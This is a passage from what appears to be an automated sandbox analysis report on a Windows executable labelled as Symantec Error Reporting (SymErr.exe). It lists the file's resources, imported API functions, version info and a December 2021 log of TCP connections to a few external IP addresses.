                        RT_ICON0xe79b00x668dataEnglishUnited States
                        RT_ICON0xe80180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0xe83000x1e8dataEnglishUnited States
                        RT_ICON0xe84e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xe86100xea8dataEnglishUnited States
                        RT_ICON0xe94b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0xe9d600x6c8dataEnglishUnited States
                        RT_ICON0xea4280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xea9900x25a8dataEnglishUnited States
                        RT_ICON0xecf380x10a8dataEnglishUnited States
                        RT_ICON0xedfe00x988dataEnglishUnited States
                        RT_ICON0xee9680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xeedd00x668dataEnglishUnited States
                        RT_ICON0xef4380x2e8dataEnglishUnited States
                        RT_ICON0xef7200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xef8480xea8dataEnglishUnited States
                        RT_ICON0xf06f00x8a8dataEnglishUnited States
                        RT_ICON0xf0f980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xf15000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0xf5a300x25a8dataEnglishUnited States
                        RT_ICON0xf7fd80x10a8dataEnglishUnited States
                        RT_ICON0xf90800x988dataEnglishUnited States
                        RT_ICON0xf9a080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xf9e700x668dataEnglishUnited States
                        RT_ICON0xfa4d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0xfa7c00x1e8dataEnglishUnited States
                        RT_ICON0xfa9a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xfaad00xea8dataEnglishUnited States
                        RT_ICON0xfb9780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0xfc2200x6c8dataEnglishUnited States
                        RT_ICON0xfc8e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0xfce500x25a8dataEnglishUnited States
                        RT_ICON0xff3f80x10a8dataEnglishUnited States
                        RT_ICON0x1004a00x988dataEnglishUnited States
                        RT_ICON0x100e280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1012900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                        RT_ICON0x1136b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                        RT_ICON0x1182e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                        RT_ICON0x11c5080x25a8dataEnglishUnited States
                        RT_ICON0x11eab00x10a8dataEnglishUnited States
                        RT_ICON0x11fb580xeb0dataEnglishUnited States
                        RT_ICON0x120a080x988dataEnglishUnited States
                        RT_ICON0x1213900x6b8dataEnglishUnited States
                        RT_ICON0x121a480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x121eb00x668dataEnglishUnited States
                        RT_ICON0x1225180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x1228000x1e8dataEnglishUnited States
                        RT_ICON0x1229e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x122b100xea8dataEnglishUnited States
                        RT_ICON0x1239b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x1242600x6c8dataEnglishUnited States
                        RT_ICON0x1249280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x124e900x25a8dataEnglishUnited States
                        RT_ICON0x1274380x10a8dataEnglishUnited States
                        RT_ICON0x1284e00x988dataEnglishUnited States
                        RT_ICON0x128e680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1292d00x668dataEnglishUnited States
                        RT_ICON0x1299380x2e8dataEnglishUnited States
                        RT_ICON0x129c200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x129d480xea8dataEnglishUnited States
                        RT_ICON0x12abf00x8a8dataEnglishUnited States
                        RT_ICON0x12b4980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x12ba000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0x12ff300x25a8dataEnglishUnited States
                        RT_ICON0x1324d80x10a8dataEnglishUnited States
                        RT_ICON0x1335800x988dataEnglishUnited States
                        RT_ICON0x133f080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1343700x668dataEnglishUnited States
                        RT_ICON0x1349d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x134cc00x1e8dataEnglishUnited States
                        RT_ICON0x134ea80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x134fd00xea8dataEnglishUnited States
                        RT_ICON0x135e780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x1367200x6c8dataEnglishUnited States
                        RT_ICON0x136de80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1373500x25a8dataEnglishUnited States
                        RT_ICON0x1398f80x10a8dataEnglishUnited States
                        RT_ICON0x13a9a00x988dataEnglishUnited States
                        RT_ICON0x13b3280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x13b7900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                        RT_ICON0x14dbb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                        RT_ICON0x1527e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                        RT_ICON0x156a080x25a8dataEnglishUnited States
                        RT_ICON0x158fb00x10a8dataEnglishUnited States
                        RT_ICON0x15a0580xeb0dataEnglishUnited States
                        RT_ICON0x15af080x988dataEnglishUnited States
                        RT_ICON0x15b8900x6b8dataEnglishUnited States
                        RT_ICON0x15bf480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x15c3b00x668dataEnglishUnited States
                        RT_ICON0x15ca180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x15cd000x1e8dataEnglishUnited States
                        RT_ICON0x15cee80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x15d0100xea8dataEnglishUnited States
                        RT_ICON0x15deb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x15e7600x6c8dataEnglishUnited States
                        RT_ICON0x15ee280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x15f3900x25a8dataEnglishUnited States
                        RT_ICON0x1619380x10a8dataEnglishUnited States
                        RT_ICON0x1629e00x988dataEnglishUnited States
                        RT_ICON0x1633680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1637d00x668dataEnglishUnited States
                        RT_ICON0x163e380x2e8dataEnglishUnited States
                        RT_ICON0x1641200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1642480xea8dataEnglishUnited States
                        RT_ICON0x1650f00x8a8dataEnglishUnited States
                        RT_ICON0x1659980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x165f000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0x16a4300x25a8dataEnglishUnited States
                        RT_ICON0x16c9d80x10a8dataEnglishUnited States
                        RT_ICON0x16da800x988dataEnglishUnited States
                        RT_ICON0x16e4080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x16e8700x668dataEnglishUnited States
                        RT_ICON0x16eed80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x16f1c00x1e8dataEnglishUnited States
                        RT_ICON0x16f3a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x16f4d00xea8dataEnglishUnited States
                        RT_ICON0x1703780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x170c200x6c8dataEnglishUnited States
                        RT_ICON0x1712e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1718500x25a8dataEnglishUnited States
                        RT_ICON0x173df80x10a8dataEnglishUnited States
                        RT_ICON0x174ea00x988dataEnglishUnited States
                        RT_ICON0x1758280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x175c900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                        RT_ICON0x1880b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                        RT_ICON0x18cce00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                        RT_ICON0x190f080x25a8dataEnglishUnited States
                        RT_ICON0x1934b00x10a8dataEnglishUnited States
                        RT_ICON0x1945580xeb0dataEnglishUnited States
                        RT_ICON0x1954080x988dataEnglishUnited States
                        RT_ICON0x195d900x6b8dataEnglishUnited States
                        RT_ICON0x1964480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1968b00x668dataEnglishUnited States
                        RT_ICON0x196f180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                        RT_ICON0x1972000x1e8dataEnglishUnited States
                        RT_ICON0x1973e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1975100xea8dataEnglishUnited States
                        RT_ICON0x1983b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                        RT_ICON0x198c600x6c8dataEnglishUnited States
                        RT_ICON0x1993280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1998900x25a8dataEnglishUnited States
                        RT_ICON0x19be380x10a8dataEnglishUnited States
                        RT_ICON0x19cee00x988dataEnglishUnited States
                        RT_ICON0x19d8680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x19dcd00x668dataEnglishUnited States
                        RT_ICON0x19e3380x2e8dataEnglishUnited States
                        RT_ICON0x19e6200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x19e7480xea8dataEnglishUnited States
                        RT_ICON0x19f5f00x8a8dataEnglishUnited States
                        RT_ICON0x19fe980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_ICON0x1a04000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                        RT_ICON0x1a49300x25a8dataEnglishUnited States
                        RT_ICON0x1a6ed80x10a8dataEnglishUnited States
                        RT_ICON0x1a7f800x988dataEnglishUnited States
                        RT_ICON0x1a89080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                        RT_GROUP_ICON0x1a8d700xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a8e200x84dataEnglishUnited States
                        RT_GROUP_ICON0x1a8ea40xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a8f540xa0dataEnglishUnited States
                        RT_GROUP_ICON0x1a8ff40xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a90a40x84dataEnglishUnited States
                        RT_GROUP_ICON0x1a91280xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a91d80xa0dataEnglishUnited States
                        RT_GROUP_ICON0x1a92780xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a93280x84dataEnglishUnited States
                        RT_GROUP_ICON0x1a93ac0xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a945c0xa0dataEnglishUnited States
                        RT_GROUP_ICON0x1a94fc0xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a95ac0x84dataEnglishUnited States
                        RT_GROUP_ICON0x1a96300xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a96e00xa0dataEnglishUnited States
                        RT_GROUP_ICON0x1a97800xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a98300x84dataEnglishUnited States
                        RT_GROUP_ICON0x1a98b40xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a99640xa0dataEnglishUnited States
                        RT_GROUP_ICON0x1a9a040xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a9ab40x84dataEnglishUnited States
                        RT_GROUP_ICON0x1a9b380xaedataEnglishUnited States
                        RT_GROUP_ICON0x1a9be80xa0dataEnglishUnited States
                        RT_VERSION0x1a9c880x340dataEnglishUnited States
                        RT_VERSION0x1a9fc80x2f8dataEnglishUnited States
                        RT_VERSION0x1aa2c00x344dataEnglishUnited States
                        RT_VERSION0x1aa6040x318dataEnglishUnited States
                        RT_VERSION0x1aa91c0x340dataEnglishUnited States
                        RT_VERSION0x1aac5c0x2f8dataEnglishUnited States
                        RT_VERSION0x1aaf540x344dataEnglishUnited States
                        RT_VERSION0x1ab2980x318dataEnglishUnited States
                        RT_VERSION0x1ab5b00x340dataEnglishUnited States
                        RT_VERSION0x1ab8f00x2f8dataEnglishUnited States
                        RT_VERSION0x1abbe80x344dataEnglishUnited States
                        RT_VERSION0x1abf2c0x318dataEnglishUnited States
                        RT_VERSION0x1ac2440x340dataEnglishUnited States
                        RT_VERSION0x1ac5840x2f8dataEnglishUnited States
                        RT_VERSION0x1ac87c0x344dataEnglishUnited States
                        RT_VERSION0x1acbc00x318dataEnglishUnited States
                        RT_VERSION0x1aced80x340dataEnglishUnited States
                        RT_VERSION0x1ad2180x2f8dataEnglishUnited States
                        RT_VERSION0x1ad5100x344dataEnglishUnited States
                        RT_VERSION0x1ad8540x318dataEnglishUnited States
                        RT_VERSION0x1adb6c0x340dataEnglishUnited States
                        RT_VERSION0x1adeac0x2f8dataEnglishUnited States
                        RT_VERSION0x1ae1a40x344dataEnglishUnited States
                        RT_VERSION0x1ae4e80x318dataEnglishUnited States
                        RT_MANIFEST0x1ae8000x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1aef800x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1af1c80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1af5940x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1afd7c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b04fc0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b07440x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b0b100x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b12f80x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b1a780x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b1cc00x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b208c0x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b28740x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b2ff40x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b323c0x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b36080x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b3df00x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b45700x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b47b80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b4b840x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b536c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b5aec0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b5d340x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                        RT_MANIFEST0x1b61000x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                        Imports

                        DLLImport
                        advapi32.dllRegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, RegEnumValueA, RegSetValueExA, RegDeleteValueA, RegEnumKeyA, RegOpenKeyExA
                        comctl32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                        gdi32.dllGetDeviceCaps, SetBkColor, CreateBrushIndirect, CreateFontIndirectA, SetTextColor, SetBkMode, SelectObject, DeleteObject
                        kernel32.dllGetCommandLineA, CreateThread, LoadLibraryExA, GetFullPathNameA, SetFileAttributesA, GlobalUnlock, WaitForSingleObject, GetTempPathA, GlobalAlloc, GetTempFileNameA, VirtualProtect, GetFileAttributesA, GetProcAddress, GetSystemDirectoryA, Sleep, SearchPathA, GlobalLock, GetPrivateProfileStringA, GetDiskFreeSpaceA, GetCurrentDirectoryA, MultiByteToWideChar, MulDiv, FindClose, lstrcpynA, GetVersion, MoveFileA, SetErrorMode, GetCurrentProcess, FindFirstFileA, GetShortPathNameA, ExpandEnvironmentStringsA, SetFilePointer, GetFileSize, lstrcmpiA, FreeLibrary, GetTickCount, RemoveDirectoryA, ReadFile, CreateDirectoryA, ExitProcess, FindNextFileA, SetCurrentDirectoryA, LoadLibraryA, SetFileTime, CreateFileA, lstrlenA, lstrcmpA, GetModuleHandleA, GetModuleFileNameA, DeleteFileA, WriteFile, CloseHandle, CompareFileTime, lstrcatA, GlobalFree, GetWindowsDirectoryA, WritePrivateProfileStringA, CopyFileA, CreateProcessA, GetExitCodeProcess, GetLastError
                        ole32.dllCoTaskMemFree, OleInitialize, CoCreateInstance, OleUninitialize
                        shell32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, ShellExecuteA, SHFileOperationA
                        user32.dllIsWindowVisible, DispatchMessageA, SendMessageTimeoutA, CreateWindowExA, GetClientRect, SetWindowPos, SystemParametersInfoA, LoadBitmapA, CharPrevA, EndPaint, DestroyWindow, EnableMenuItem, AppendMenuA, ShowWindow, SetWindowLongA, InvalidateRect, EnableWindow, OpenClipboard, EmptyClipboard, GetMessagePos, SendMessageA, ExitWindowsEx, IsWindowEnabled, BeginPaint, GetSysColor, PostQuitMessage, GetSystemMetrics, MessageBoxIndirectA, SetDlgItemTextA, EndDialog, SetClassLongA, GetDC, DefWindowProcA, CloseClipboard, GetDlgItemTextA, SetForegroundWindow, FillRect, LoadCursorA, CharNextA, IsWindow, GetSystemMenu, CreateDialogParamA, GetWindowRect, RegisterClassA, GetWindowLongA, DrawTextA, FindWindowExA, CheckDlgButton, TrackPopupMenu, wsprintfA, DialogBoxParamA, CreatePopupMenu, SetCursor, SetWindowTextA, ScreenToClient, LoadImageA, SetClipboardData

                        Exports

                        NameOrdinalAddress
                        DllRegisterServer10x1002513f

                        Version Infos

                        DescriptionData
                        LegalCopyrightCopyright 2016 Symantec Corporation. All rights reserved.
                        InternalNameSymErr
                        FileVersion7.6.2.5
                        CompanyNameSymantec Corporation
                        ProductNameSymantec Shared Component
                        ProductVersion7.6
                        FileDescriptionSymantec Error Reporting
                        OriginalFilenameSymErr.exe
                        Translation0x0409 0x04b0

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 14, 2021 10:33:56.169133902 CET49772443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.169179916 CET4434977218.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.169270992 CET49772443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.170115948 CET49772443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.170137882 CET4434977218.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.320444107 CET4434977218.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.323769093 CET49773443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.323807001 CET4434977318.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.323893070 CET49773443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.325078011 CET49773443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.325093985 CET4434977318.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.384921074 CET49774443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.384965897 CET4434977418.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.385071993 CET49774443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.385968924 CET49774443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.385997057 CET4434977418.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.445888996 CET49775443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.445933104 CET443497753.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.446013927 CET49775443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.446840048 CET49775443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.446865082 CET443497753.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.475581884 CET4434977318.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.477123976 CET49776443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.477180004 CET4434977618.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.477348089 CET49776443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.478054047 CET49776443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.478080034 CET4434977618.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.536524057 CET4434977418.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.538096905 CET49777443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.538141012 CET4434977718.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.538228035 CET49777443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.539164066 CET49777443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.539185047 CET4434977718.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.597301960 CET443497753.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.599082947 CET49778443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.599128008 CET443497783.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.599239111 CET49778443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.600239038 CET49778443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.600253105 CET443497783.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.628398895 CET4434977618.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.629982948 CET49779443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.630032063 CET4434977918.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.630146980 CET49779443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.630968094 CET49779443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.630990982 CET4434977918.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.689443111 CET4434977718.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.691081047 CET49780443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.691126108 CET4434978018.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.691215992 CET49780443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.692574978 CET49780443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.692596912 CET4434978018.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.750622034 CET443497783.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.752547979 CET49781443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.752585888 CET443497813.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.752688885 CET49781443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.753557920 CET49781443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.753567934 CET443497813.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.755451918 CET49782443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.755487919 CET4434978218.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.755567074 CET49782443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.756136894 CET49782443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.756164074 CET4434978218.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.781342030 CET4434977918.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.843327045 CET4434978018.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.845531940 CET49783443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.845575094 CET4434978318.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.845649958 CET49783443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.846473932 CET49783443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.846491098 CET4434978318.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.903898001 CET443497813.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.905615091 CET49784443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.905653000 CET443497843.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.905747890 CET49784443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.906493902 CET4434978218.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.906672955 CET49784443192.168.2.53.12.124.139
                        Dec 14, 2021 10:33:56.906692982 CET443497843.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:56.908546925 CET49785443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.908580065 CET4434978518.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.908668995 CET49785443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.909574032 CET49785443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:56.909584999 CET4434978518.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:56.996841908 CET4434978318.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.057349920 CET443497843.12.124.139192.168.2.5
                        Dec 14, 2021 10:33:57.060131073 CET4434978518.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.065263033 CET49786443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:57.065311909 CET4434978618.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.065414906 CET49786443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:57.066065073 CET49786443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:57.066081047 CET4434978618.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.216689110 CET4434978618.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.226584911 CET49787443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:57.226634979 CET4434978718.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.226720095 CET49787443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:57.227541924 CET49787443192.168.2.518.219.227.107
                        Dec 14, 2021 10:33:57.227566004 CET4434978718.219.227.107192.168.2.5
                        Dec 14, 2021 10:33:57.378197908 CET4434978718.219.227.107192.168.2.5
                        Dec 14, 2021 10:34:06.990562916 CET49795443192.168.2.579.110.52.144
                        Dec 14, 2021 10:34:06.990613937 CET4434979579.110.52.144192.168.2.5
                        Dec 14, 2021 10:34:06.990704060 CET49795443192.168.2.579.110.52.144
